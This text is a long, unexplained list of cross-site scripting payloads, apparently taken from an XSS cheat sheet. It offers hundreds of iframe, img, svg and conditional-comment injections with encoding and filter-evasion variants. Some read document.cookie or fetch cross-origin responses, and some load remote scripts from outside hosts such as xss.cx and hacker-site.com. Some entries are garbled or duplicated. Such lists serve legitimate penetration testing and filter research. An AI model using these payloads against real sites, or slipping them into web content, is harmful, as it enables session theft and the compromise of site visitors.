- http://domain/page?p=%26p=%26lt;svg/onload=alert(1)><j%20onclick=location%2B=document.body.textContent>click%20me![BODY_CONTENT]&p=<svg/onload=alert(1)>click me!
- http://domain/page?p=%3Cj%20onclick=location%2B=textContent%3E%26p=%26lt;svg/onload=alert(1)%3E&p=<svg/onload=alert(1)>
- http://domain/page?p=%3Cj%26p=%3Csvg%2Bonload=alert(1)%20onclick=location%2B=outerHTML%3Eclick%20me!<j&p=<svg+onload=alert(1) onclick=location+=outerHTML>
- http://DOMAIN/PAGE.php/"><svg onload=alert(1)>
- http://domain/page?p=<j%20onclick=location%2B=textContent>%26p=%26lt;svg/onload=alert(1)>&p=<svg/onload=alert(1)>
- http://domain/page?p=<j%26p=<svg%2Bonload=alert(1)%20onclick=location%2B=outerHTML>click%20me!<j&p=<svg+onload=alert(1) onclick=”location+=outerHTML”>
- http://domain/page?p=<script/src=//3237054390/1+
- http://domain/page?p=<svg/onload=alert(1)>
- http://domain/page?p=<svg/onload=alert(1)+
- http://DOMAIN/WP-ROOT/wp-content/plugins/akismet/index.php?brute=CMD
- @brutelogic.com.br/webgun/test.php?p=”>http://javascript:alert(1)@brutelogic.com.br/webgun/test.php?p=<svg+onload=location=URL.slice(7,26)>
- <http://onxxx%3D1/
- <http://onxxx%3D151/
- http://...?p=<script/src=//brutelogic.com.br/1+
- http://...?p=<svg/onload=alert(1)+
- http(s)://host/page?p=XSS
- http://target.com/something.jsp?inject=<script>eval(location.hash.slice(1))</script>#alert(1)
- http://target.com/something.xxx?a=val1&a=val2
- http://window.open (“http://tpc.googlesyndication.com/safeframe/1-0- K”,”1;25;<svg/onload=alert(/XSS/)>true”)
- http://www.google<script .com>alert(document.location)</script
- http://www.google<script .com>confirm(document.location)</script
- http://www.<script abc>setTimeout(‘confirm(1)’,1)</script .com>
- http://www.<script>alert(1)</script .com
- http://www.<script>confirm(1)</script .com
- http://www.simpatie.ro/index.php?page=friends&member=781339&javafunctionname=Pageclick&javapgno=2 javapgno=2 ??XSS??
- http://www.simpatie.ro/index.php?page=top_movies&cat=13&p=2 p=2 ??XSS??
- http://xsst.sinaapp.com/utf-32-1.php?charset=utf-8&v=><img src=x onerror=prompt(0);>
- http://xsst.sinaapp.com/utf-32-1.php?charset=utf-8&v=v><img src=x onerror=prompt(0);>
- http://xsst.sinaapp.com/utf-32-1.php?charset=utf-8&v=XSS
- HYPERLINK TAG INJECTION:
- (i=0;i<100;)
- @i\6d\70o\72\74'javascr\ipt:alert(document.cookie)’;
- i = document.createElement(input);
- id=XSS SRC=<IMG 6;avascript:alert(‘XSS’)>
- id=xss style=overflow:scroll>
- if(1)confirm(1)}{
- if(/*@cc_on!@*/0==1){alert(1);}else{alert(2);}</script>
- <;! — [if gte IE 4]>;
- <! — [if gte IE 4]>
- <! — [if gte IE 4]><SCRIPT>alert(‘XSS’);</SCRIPT><![endif] →
- <! — [if gte IE 4]> <SCRIPT>alert(‘XSS’);</SCRIPT> <![endif] →
- <! — [if gte IE 4]><SCRIPT>document.vulnerable=true;</SCRIPT><![endif] →
- <! — [if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif] →
- <! — [if IE]><img src=# width=0 height=0 onerror=alert(/insight-labs/)><![endif] →
- <! — [if IE]><img src=# width=0 height=0 onerror=alert(/ourren_demo/)><![endif] →
- <![if<iframe
- <![if<iframe/onload=alert(1)//]>
- <![if<iframe/onload=vbs::alert[:]>
- <! — [if<img src=x onerror=alert(2)//]> →
- <! — [if<img src=x onerror=javascript:alert(1)//]> →
- <! — [if<img src=x:x onerror=confirm(5)//] →
- <ifra<ifame>me>…</ifra</iframe>me>
- <iframe/%00/ src=javaSCRIPT:alert(1)
- <iframe/%00/ src=javaSCRIPT:confirm(1)
- <iframe %00 src=”	javascript:prompt(1)	”%00>
- <iframe%0Aname=”javascript:\u0061\u006C\u0065\u0072\u0074(1)”
- <iframe%0Aname=”javascript:\u0061\u006C\u0065\u0072\u0074(1)” %0Aonload=”eval(name)”;>
- “><iframe%20src=”http://google.com"%%203E
- <IFRAME%20src=’javascript:confirm%26%23x25;281)’>
- iframe.contentWindow.location.constructor.prototype
- </iframe><form method=post action=LOGIN_URL>
- <iframe id=%22ifra%22 src=%22/%22></iframe> <script>ifr = document.getElementById(‘ifra’); ifr.contentDocument.write(%22<scr%22 %2b %22ipt>top.foo = Object.defineProperty</scr%22 %2b %22ipt>%22); foo(window, ‘Safe’, {value:{}}); foo(Safe, ‘get’, {value:function() { return document.cookie }}); alert(Safe.get());</script>
- <iframe id=%22ifra%22 src=%22/%22></iframe> <script>ifr = document.getElementById(‘ifra’); ifr.contentDocument.write(%22<scr%22 %2b %22ipt>top.foo = Object.defineProperty</scr%22 %2b %22ipt>%22); foo(window, ‘Safe’, {value:{}}); foo(Safe, ‘get’, {value:function() { return document.cookie }}); alert(Safe.get());</script>
- <iframe id=%22ifra%22 src=%22/%22></iframe> <script>ifr = document.getElementById(‘ifra’); ifr.contentDocument.write(%22<scr%22 %2b %22ipt>top.foo = Object.defineProperty</scr%22 %2b %22ipt>%22); foo(window, ‘Safe’, {value:{}}); foo(Safe, ‘get’, {value:function() { return document.cookie }}); confirm(Safe.get());</script>
- <iframe id=t:alert(1) name=javascrip onload=location=name%2bid>
- <iframe id=XSS / /onload=alert(/XSS/)></iframe>
- <iframe id=XSS / “onload=alert(/XSS/)></iframe>
- <iframe id=XSS “onload=alert(/XSS/)></iframe>
- <iframe id=XSS///////onload=alert(/XSS/)></iframe>
- <iframe id=XSS <?php echo chr(11)?> onload=alert(/XSS/)></iframe>
- <iframe id=XSS <?php echo chr(12)?> onload=alert(/XSS/)></iframe>
- <IFRAME id=XSS SRC=”javascript:alert(‘XSS’); <
- <IFRAME id=XSS SRC=”javascript:alert(‘XSS’);”></IFRAME>
- <iframe><iframe src=javascript:alert(/@jackmasa/)></iframe>
- <iframe><iframe src=javascript:confirm(4)></iframe>
- <IFRAME name=”F1" src=”http://target/#<SCRIPT>var secret=’1232';”></IFRAME>
- <IFRAME name=”F2" src=”http://target/#<SCRIPT>var secret=’1233';”></IFRAME>
- <IFRAME name=”F3" src=”http://target/#<SCRIPT>var secret=’1234';”></IFRAME>
- <iframe/name=”if(0){\u0061lert(1)}else{\u0061lert(1)}”/onload=”eval(name)”;>
- <iframe name=javascript:alert(1) src=http://www.target.com/?xss=<svg/onload=location=name//>
- <iframe/name=”javascript:confirm(1);”onload=”while(1){eval(name);}”>
- <iframe ng-src=javascript:..>
- <iframe onbeforeload iframe onbeforeload=”javascript:javascript:alert(1)”></iframe onbeforeload>
- <iframe onload=%22write(‘<script>’%2Blocation.hash.substr(1)%2B’</script>’)%22></iframe>#var xhr = new XMLHttpRequest();xhr.open(‘GET’, ‘http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = ‘(.*?)’/)[1]) };xhr.send();
- <iframe onload=%22write(‘<script>’%2Blocation.hash.substr(1)%2B’</script>’)%22></iframe>#var xhr = new XMLHttpRequest();xhr.open(‘GET’, ‘http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { confirm(xhr.responseText.match(/cookie = ‘(.*?)’/)[1]) };xhr.send();
- “><iframe/onload=alert(1)>
- <iframe onload=”alert(1)”></iframe>
- <iframe/onload=alert(document.domain)></iframe>
- <iframe/onload=alert(/INJECTX/)>
- <iframe onload iframe onload=”javascript:javascript:alert(1)”></iframe onload>
- <iframe onLoad iframe onLoad=”javascript:javascript:alert(1)”></iframe onLoad>
- <iframe onload=popup=1;>
- <iframe/onload=’this[“src”]=”javas	cript:al”+”ert``”’;>
- <iframe/onload=’this[“src”]=”javas	cript:al”+”ert``”’;
- <iframe/onreadystatechange=alert(1)
- <iframe/onreadystatechange=confirm(1)
- “><iframe/onreadystatechange=confirm(1)
- <iframe onReadyStateChange iframe onReadyStateChange=”javascript:javascript:alert(1)”></iframe onReadyStateChange>
- <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074(‘\u0061’) worksinIE>
- <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074(‘\u006worksinIE>
- <iframe<?php echo chr(11)?> onload=alert(‘XSS’)></iframe>
- <iframe<?php echo chr(11)?> onload=alert(‘XSS’)></iframe>
- “></iframe><script>alert(123)</script>
- “></iframe><script>alert(123)</script>
- “></iframe><script>alert(document.cookie);</script>
- “></iframe><script>alert(`TEXT YOU WANT TO BE DISPLAYED`);</script><iframe frameborder=”0%EF%BB%BF
- <iframesrc='http://www.target.com?foo="xss autofocus/AAAAA
- <iframesrc='http://www.target.com?foo="xss autofocus/AAAAA onfocus=location=window.name//'
- <iframe/src=%2f⾾n.mario#%0Anew%20alert%20`3`;width=1 height=1 style=visibility:hidden;/>
- <iframe src=%22404%22 onload=%22content.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open(‘GET’,’http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
- <iframe src=%22404%22 onload=%22content.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open(‘GET’,’http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){confirm(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
- <iframe src=%22404%22 onload=%22frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open(‘GET’,’http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
- <iframe src=%22404%22 onload=%22frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open(‘GET’,’http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){confirm(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
- <iframe src=%22404%22 onload=%22self.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open(‘GET’,’http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
- <iframe src=%22404%22 onload=%22self.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open(‘GET’,’http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){confirm(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
- <iframe src=%22404%22 onload=%22top.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open(‘GET’,’http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
- <iframe src=%22404%22 onload=%22top.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open(‘GET’,’http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){confirm(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
- <iframe src=Javascript:alert(53)>
- <iframe/src=about:blank onload=alert(1)>
- <iframe src=”//brutelogic.com.br/tests/status.html” onload=”frames[0].postMessage(‘<script>alert(document.domain)’,’*’)”>
- <iframe src=”data:D,<script>confirm(top.document.body.innerHTML)</script>”>
- <iframe src=”data:image/svg-xml,%1F%8B%08%00%00%00%00%00%02%03%B3)N.%CA%2C(Q%A8%C8%CD%C9%2B%B6U%CA())%B0%D2%D7%2F%2F%2F%D7%2B7%D6%CB%2FJ%D77%B4%B4%B4%D4%AF%C8(%C9%CDQ%B2K%CCI-*%D10%D4%B4%D1%87%E8%B2%03"></iframe>
- <iframe src=”data:message/rfc822,Content-Type: text/html;%0aContent-Transfer-Encoding: quoted-printable%0a%0a=3CSCRIPT=3Econfirm(document.location)=3C/SCRIPT=3E”></iframe>
- <iframe src=\”data:),<script>alert(document.domain)</script>”></iframe>
- <iframe/src=”data:text/html,
- <iframe src=”data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E”></iframe>
- <iframe src=”data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E”></iframe>
- <IFRAME/SRC=DATA:TEXT/HTML;BASE64,ICA8U0NSSVBUIC8NU1JDPSINSFRUUFM6DS8NDS8NSEVJREVSSS5DSC96DSINID4NPC9TQ1JJUFQNDT5>
- <iframe src=”data:text/html;base64,PFNDUklQVD5hbGVydCgnUkVOV0FYMjMnKTs8L1NDUklQVD4=”/>
- <iframe src=”data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==”></iframe> (Firefox, Chrome, Safari)
- <iframe src=”data:text/html,<script>alert(1)</script>”></iframe>
- <iframe/src=”data:text/html&p=<svg/onload=alert(49)>”>
- <iframe src=”data:text/html,<script>alert(0)</script>”></iframe> (Firefox, Chrome, Safari)
- <iframe/src=”data:text/html,<svg%09%0A%0B%0C%0D%A0%00%20onload =confirm(1);>”;>
- <iframe src=”data:text/html,<svg onload=alert(1)>”>
- <iframe/src=”data:text/html,<svg onload=alert(1)>”>
- <iframe/src=”data:text/html,<svg onload=confirm(1)>”>
- <iframe/src=”data:text/html,<svg onload=alert(1)>”>
- <iframe/src=”data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==”>
- <iframe/src=”data:text/html;	base64
,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==”>
- <Iframe / src = “data: text & sol; html; & Tab; base64 & NewLine;, PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg ==”>
- <iframe srcdoc=%26lt;svg/o%26%23x6Eload%26equals;alert%26lpar;1)%26gt;>
- <iframe srcdoc=’<body onload=prompt(1)>’>
- <iframe srcdoc=”<iframe/srcdoc=&lt;img/src=&apos;&apos;onerror=javascript:alert(1)&gt;>”>
- <iframe srcdoc=\”<iframe srcdoc=’&lt;iframe onload=alert(1)&gt;’>\”></iframe>
- “><iframe srcdoc=”<img src=x:x onerror=alert(1)>”>
- <iframe srcdoc=”<script>alert(1)</script>”></iframe>
- <iframe srcdoc=’<svg/onload=alert(1)>’>
- <iframe srcdoc=’<svg/onload=alert(/@80vul/)>’>
- <iframe srcdoc=’<svg/onload=confirm(3)>’>
- <iframe srcdoc=<svg/onload=alert(1)>>
- <iframe srcdoc=”<svg onload=alert(1)>⃒”></iframe>
- <iframe srcdoc=”<svg/onload=confirm(domain)>”>
- <iframe srcdoc=<svg/onload=alert(173)>>
- <iframe srcdoc=<svg/onload=alert(1)>>
- <iframe srcdoc=<svg/onload=alert(1)>>
- <iframe src=”http://0x.lv/xss.swf"></iframe>
- <IFRAME SRC=��http://hacker-site.com/xss.html��>
- <IFRAME SRC=http://hacker-site.com/xss.html>
- <iframe src=http://ha.ckers.org/scriptlet.html <
- <;IFRAME SRC=http://ha.ckers.org/scriptlet.html <;
- <IFRAME SRC=http://ha.ckers.org/scriptlet.html <
- <iframe src=”http://localhost"></iframe>
- <iframe src=”http://target.com/something.jsp?inject=<script>eval(name)</script>" name=”alert(1)”></iframe>
- <iframe/src=”http://www.b.com/1.swf?get-data=(function(){alert(document.cookie)})()"></iframe>
- <iframe/src=”http://www.b.com/1.swf?get-data=(function(){location.href=%22javascript:'<script>alert(document.cookie)</script>'%22})()"></iframe>
- “> “><iframe src=http://xss.cx onload=confirm(5) <<iframe src=a> “><iframe src=http://xss.cx onload=confirm(8) <
- <iframe src=”http://xss.cx?x=<iframe name=x></iframe>”></iframe><a href=”http://xss.ms" target=x id=x></a><script>window.onload=function(){x.click()}</script>
- <iframe src=`http://xssme.html5sec.org/?xss=<iframe onload=%22xhr=new XMLHttpRequest();xhr.open(‘GET’,’http://html5sec.org/xssme2',true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();%22>`>
- <iframe src=`http://xssme.html5sec.org/?xss=<iframe onload=%22xhr=new XMLHttpRequest();xhr.open(‘GET’,’http://html5sec.org/xssme2',true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){confirm(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();%22>`>
- <iframe src=http://xss.rocks/scriptlet.html <
- /*iframe/src*/<iframe/src=”<iframe/src=@”/onload=prompt(1) /*iframe/src*/>
- /*iframe/src*/<iframe/src=”<iframe/src=@”/onload=prompt/*iframe/src*/>
- <iframe src iframe src=”javascript:javascript:alert(1)”></iframe src>
- <iframe src=”jar://html5sec.org/test.jar!/test.html”></iframe>
- <iframe src=”jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e”></iframe>
- <iframe src=”javascript:%61%6c%65%72%74%28%31%29"></iframe>
- <IFRAME/SRC=JAVASCRIPT:%61%6c%65%72%74%28%31%29></iframe>
- <IFRAME/SRC=JAVASCRIPT:%61%6c%65%72%74%28%31%29></iframe> // Cross Browser (PEPE Vila)
- <iframe src=javascript:alert(1)>
- <iframe src=javascript:alert(1)>
- <iframe src=javascript:alert(161)>
- <iframe src=”java script:alert(1)” height=0 width=0 /><iframe> <! —
- <iframe src=”java script:alert(1)” height=0 width=0 /><iframe>
- <iframe src=”javascript:al ert(1)” height=0 width=0 /><iframe> <! —
- <iframe src=”javascript:al ert(1)” height=0 width=0 /><iframe>
- → <iframe src=java script:alert(1); height=0 width=0 /><iframe>
- <iframe src=”java script:alert(1)” height=0 width=0 /><iframe> <! — Java
- <iframe src=”javascript:alert(1)”></iframe>
- <iframesrc=”javascript:alert(2)”>
- <IFRAME SRC=”javascript:alert(29);”></IFRAME>
- <iframe src=”javascript:alert(69)%%0D3C! —
- <iframe src=”javascript:alert(71)%%0D3C! —
- “><iframe src=javascript:alert(document.cookie); height=0 width=0 /> <iframe>
- <IFR AME src=javascript:alert(‘XSnS’)></IFRA ME>
- “><iframe src=”javascript:alert(XSS)”>
- ><iFrAmE/src=jAvAscrIpT:alert(/Xss/)>
- ��><iFrAmE/src=jAvAscrIpT:alert(/Xss/)>
- ><iFrAmE/src=jAvAscrIpT:alert(/Xss-By-Muhaddi/)>
- <iframe src=”javascript:alert(‘XSS by \nxss’);”></iframe><marquee><h1>XSS by xss</h1></marquee>
- ><iFrAmE/src=jAvAscrIpT:alert(/xss-by-shawar/)>
- <;IFRAME SRC=”;javascript:alert(‘;XSS’;);”;>;<;/IFRAME>;
- <IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
- <IFRAME SRC=”javascript:alert(XSS);”></IFRAME>
- <iframe// src=javaSCRIPT:alert(1)
- <iframe src=javascript:alert(document.location)>
- <iframe src=javascript:confirm(document.location)>
- <IFRAME SRC=”javascript:confirm(5);”></IFRAME>
- “><iframe/src=javascript:co\u006efir\u006d%28 1%29>
- <iframe src=”javascript:document.vulnerable=true; <
- <IFRAME SRC=”javascript:document.vulnerable=true;”></iframe>
- <iframe/src=’javascript:if(null==null){javascript:0?1:confirm(1);}’>
- <IFRAME SRC=”javascript:javascript:alert(1);”></IFRAME>
- “><iframe/src=javascript:prompt(1)>
- <iframe src=”javascript:’<script src=http://xss.cx ></script>’”></iframe>
- <iframe src=”javascript:’<script src=//pkav></script>’”>
- <iframe src=”javascript:’<script src=>;</script>’”></iframe>
- <iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															%28
																1
																	%29></iframe> ?
- <iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															%28
																1
																	%29></iframe> ?
- <iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															%28
																1
																	%29></iframe>
- <iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															28
																1
																	%29></iframe>
- <iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>
- <iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>
- <iframe/src=j	av	as	cri	pt	:co	nfir	m	(		1	)>
- <iframe src=//localhost/self/logout.php
- <iframe src=LOGOUT_URL onload=forms[0].submit()>
- <iframe src=mhtml:http://html5sec.org/test.gif!xss.html></iframe>
- <iframe src=mhtml:http://html5sec.org/test.html!xss.html></iframe>
- “><iframe src=’’ onload=alert(‘atul’)>
- <iframe src=/ onload=eval(unescape(this.name.replace(/\/g,null))) name=fff%253Dnew%2520this.contentWindow.window.XMLHttpRequest%2528%2529%253Bfff.open%2528%2522GET%2522%252C%2522xssme2%2522%2529%253Bfff.onreadystatechange%253Dfunction%2528%2529%257Bif%2520%2528fff.readyState%253D%253D4%2520%2526%2526%2520fff.status%253D%253D200%2529%257Balert%2528fff.responseText%2529%253B%257D%257D%253Bfff.send%2528%2529%253B></iframe>
- <iframe src=/ onload=eval(unescape(this.name.replace(/\/g,null))) name=fff%253Dnew%2520this.contentWindow.window.XMLHttpRequest%2528%2529%253Bfff.open%2528%2522GET%2522%252C%2522xssme2%2522%2529%253Bfff.onreadystatechange%253Dfunction%2528%2529%257Bif%2520%2528fff.readyState%253D%253D4%2520%2526%2526%2520fff.status%253D%253D200%2529%257Bconfirm%2528fff.responseText%2529%253B%257D%257D%253Bfff.send%2528%2529%253B></iframe>
- <iframe/src \/\/onload = prompt(1)
- “><iframe/src \/\/onload = prompt(1)
- <IFRAME SRC=# onmouseover=”alert(document.cookie)”></IFRAME>
- <iframe src=”” onmouseover=”confirm(document.cookie)”>
- <iframe src=?p=%253Csvg/o%256Eload%253Dalert(1)%253E>
- <iframe src=?p=%26lt;svg/o%256Eload%26equals;alert(1)%26gt;>
- <iframe src=%(scriptlet)s <
- <iframe src=””srcdoc=”data:,<svg/onload=alert(191)>”191=” sandbox>
- <iframe src=””/srcdoc=’<svg onload=alert(1)>’>
- <iframe src=”#” style=width:exp/**/ressi/**/on(confirm(1))>
- <iframe src=”	javascript:prompt(1)	”>
- <iframe src=”	javascript:prompt(1)	”>
- <iframe src=’//target.com/vulnpage.php?a=%1B$*H%1BN&b=%20type=image%20src=x%20onerror=alert(document.characterSet);//’>
- <iframe src=//targetsite.com?xss=<div/style=”width:expression(confirm(1))”>X</div>
- <iframe src=//targetsite?xss=<svg/onload%00=%00locatio%00n=nam%00e
- ><iframe src=/tests/cors/%23/tests/auditor.php?q1=<img/src=x onerror=alert(1)
- “><iframe src=”/tests/cors/%23/tests/auditor.php?q1=<img/src=x onerror=alert(1)”
- <iframe src=”vbscript:document.vulnerable=true;”>
- <iframe src=”vbscript:msgbox(1)”></iframe>
- <iframe src=”vbscript:msgbox(1)”></iframe> (IE)
- <iframe src=”\x01javascript:alert(0)”></iframe> <! — Example for Chrome →
- <iframe src=”javascript:alert(1)”></iframe>
- <iframe src=”x-javascript:alert(document.domain);”></iframe>
- <iframe src=x onerror=prompt(1)>
- <iframe style=display:none name=x></iframe>
- <iframe style=”position:absolute;top:0;left:0;width:100%;height:100%” onmouseover=”prompt(1)”>
- “><iframe style=”position:absolute;top:0;left:0;width:100%;height:100%” onmouseover=”prompt(1)”>
- <iframe style=”xg-p:absolute;top:0;left:0;width:100%;height:100%” onmouseover=”prompt(1)”>
- <iframe width=0 height=0 src=”javascript:confirm(1)”>
- <IFRAME width=”420" height=”315" frameborder=”0" onload=”alert(document.cookie)”></IFRAME>
- <iframe xmlns=”#” src=”javascript:alert(1)”></iframe>
- <! — [if]><script>alert(1)</script →
- <! — [if]><script>alert(1)</script →
- <! — [if]><script>alert(1)</script → <! — [if<img src=x onerror=alert(1)//]> →
- <! — [if]><script>alert(1)</script → // Works upto IE9 ?http://html5sec.org/#115
- <! — [if]><script>confirm(1)</script →
- <! — [if]><script>javascript:alert(1)</script →
- <! — [if WindowsEdition]><script>confirm(location);</script><![endif] →
- <image img=javascript:alert(XSS@%2Bdocument.domain caption= />
- <image src=1 href=1 onerror=”javascript:alert(1)”></image>
- <image src=”https://github.com/dummy.jpa href=1 onerror=”javascript:alert(document.cookie)”></image>
- <image src=”javascript:alert(1)”>
- <image src=”javascript:alert(2)”> // IE6, O10.10, OM10.0
- <image xlink:href=”data:image/svg+xml,%3Csvg xmlns=’http://www.w3.org/2000/svg' onload=’alert(1)’%3E%3C/svg%3E”/>
- <IMG />”>
- <IMG />
- <img/	  src=`~` onerror=prompt(1)>
- <img%09onerror=alert(1) src=a>
- <IMG%0aSRC%0a=%0a”%0aj%0aa%0av%0aa%0as%0ac%0ar%0ai%0ap%0at%0a:%0aa%0al%0ae%0ar%0at%0a(%0a’%0aX%0aS%0aS%0a’%0a)%0a”%0a>
- <IMG%20DYNSRC=”javascript:alert(‘WXSS’)”>
- <IMG%20LOWSRC=”javascript:alert(‘WXSS’)”>
- <IMG%20"””><SCRIPT>alert(“WXSS”)</SCRIPT>”>
- <IMG%20SRC=javascript:alert('XSS')>
- <IMG%20SRC=javascript:alert('XSS')>
- <IMG%20SRC=”%20%20javascript:alert(‘WXSS’);”>
- <IMG%20SRC=’%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)’>
- =<img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert%26%23x28;1%26%23x29;>
- >”’><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)>
- >”’><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;confirm(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)>
- <IMG%20SRC=’javasc ript:alert(document.cookie)’>
- <IMG%20SRC=’javascript:alert(document.cookie)’>
- <IMG%20SRC=javascript:alert("WXSS")>
- <IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))>
- <IMG%20SRC=`javascript:alert(“‘WXSS’”)`>
- <IMG%20SRC=”jav ascript:alert(‘WXSS’);”>
- <IMG%20SRC=”javascript:alert(‘WXSS’);”>
- <IMG%20SRC=”javascript:alert(‘WXSS’)”
- <IMG%20SRC=javascript:alert(‘WXSS’)>
- <IMG%20SRC=JaVaScRiPt:alert(‘WXSS’)>
- <IMG%20SRC=”jav	ascript:alert(‘WXSS’);”>
- <IMG%20SRC=”jav
ascript:alert(‘WXSS’);”>
- <IMG%20SRC=”jav
ascript:alert(‘WXSS’);”>
- <img%20src=x%20onerror=alert(1)>
- <IMG%20SRC=javascript:alert('XSS')>
- <img=”=”%20title=’”><img src=”=”onerror=alert(1)>”>’
- <img[a][b][c]src[d]=x[e]onerror=[f]”alert(1)”>
- <img/alt=1 onerror=eval(src) src=x:alert(alt) >
- <![><IMG ALT=”]><SCRIPT>confirm(1)</SCRIPT>”>
- <IMG ALT=”><SCRIPT>confirm(1)</SCRIPT>”(EOF)
- <img border=3 alt=jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e>
- <IMG DYN id=XSS SRC=”javascript:alert(‘XSS’)”>
- <IMG DYNid=XSS SRC=”javascript:alert(‘XSS’)”>
- <IMG+DYNSRC=”javascript:alert(1);”>
- <IMG DYNSRC=”javascript:alert(‘XhSS’)”>
- <;IMG DYNSRC=”;javascript:alert(‘;XSS’;);”;>;
- <IMG DYNSRC=”javascript:alert(‘XSS’);”>
- <IMG DYNSRC=”javascript:alert(‘XSS’)”>
- <IMG DYNSRC=”javascript:alert(XSS)”>
- <IMG DYNSRC=\”javascript:alert(‘XSS’)\”>
- <IMG DYNSRC=”javascript:confirm(document.location)”>
- <img dynsrc=”javascript:document.vulnerable=true;”>
- <img DYNSRC=”javascript:document.vulnerable=true;”>
- <IMG DYNSRC=”javascript:javascript:alert(1)”>
- <IMG DYNSRC_NeatHtmlReplace=”javascript:alert(‘XSS’)”>
- <img/id=”alert('XSS')\”/alt=\”/\”src=\”/\”onerror=eval(id)>
- <img id=��><��class=��><��src=��>��onerror=alert(9)>
- <img/id=”confirm(1)”/alt=”/”src=”/”onerror=eval(id)>’”>
- <IMG id=XSS SRC=”&14;javascript:alert(‘XSS’);”>
- <IMG id=XSS SRC=&{alert(‘XSS’);};>
- <img id=XSS SRC=”blah>”onmouseover=”alert(‘XSS’);”>
- <img id=XSS SRC=”blah”onmouseover=”alert(‘XSS’);”>
- <IMG id=XSS SRC=”jav
- <IMG id=XSS SRC=`javascript:alert(“RSnake says, ‘XSS’”)`>
- <IMG id=XSS SRC=javascript:alert(String.fromCharCode(88,83,83))>
- <IMG id=XSS SRC=`javascript:alert(“‘XSS’”)`>
- <IMG id=XSS SRC=’javascript:alert(‘XSS’)
- <IMG id=XSS SRC=” javascript:alert(‘XSS’);”>
- <IMG id=XSS SRC=”jav ascript:alert(‘XSS’);”>
- <IMG id=XSS SRC=”jav ascript:alert(‘XSS’);”>
- <IMG id=XSS SRC=”javascript:alert(‘XSS’);”>
- <IMG id=XSS SRC=”javascript:alert(‘XSS’)”
- <IMG id=XSS SRC=javascript:alert(‘XSS’)>
- <IMG id=XSS SRC=javascript:alert(“XSS”)>
- <IMG id=XSS SRC=JaVaScRiPt:alert(‘XSS’)>
- <IMG id=XSS SRC=”livescript:[code]”>
- <IMG id=XSS SRC=”mocha:[code]”>
- <IMG id=XSS SRC=’vbscript:msgbox(“XSS”)’>
